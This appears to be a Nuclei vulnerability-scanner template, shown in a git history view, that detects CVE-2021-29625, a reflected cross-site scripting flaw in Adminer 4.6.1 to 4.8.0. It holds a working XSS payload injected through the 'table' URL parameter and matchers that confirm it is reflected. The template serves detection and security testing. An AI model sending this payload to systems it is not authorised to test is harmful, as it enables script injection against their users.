nuclei-templates/cves/2021/CVE-2021-29625.yaml

33 lines
1.4 KiB
YAML
Raw Normal View History

2021-09-05 10:12:40 +00:00
id: CVE-2021-29625
info:
name: Adminer reflected XSS via the table parameter
author: daffainfo
description: Adminer is open-source database management software. A cross-site scripting vulnerability in Adminer versions 4.6.1 to 4.8.0 affects users of MySQL, MariaDB, PgSQL and SQLite. XSS is in most cases prevented by strict CSP in all modern browsers. The only exception is when Adminer is using a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled). In browsers without CSP, Adminer versions 4.6.1 to 4.8.0 are affected. The vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`).
severity: medium
reference:
- https://sourceforge.net/p/adminer/bugs-and-features/797/
- https://www.cvedetails.com/cve/CVE-2021-29625/
tags: cve,cve2021,adminer,xss
requests:
- method: GET
path:
2021-09-06 09:46:12 +00:00
- '{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-09-05 10:12:40 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-09-06 09:46:12 +00:00
- "</script><script>alert(document.domain)</script>"
2021-09-05 10:12:40 +00:00
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200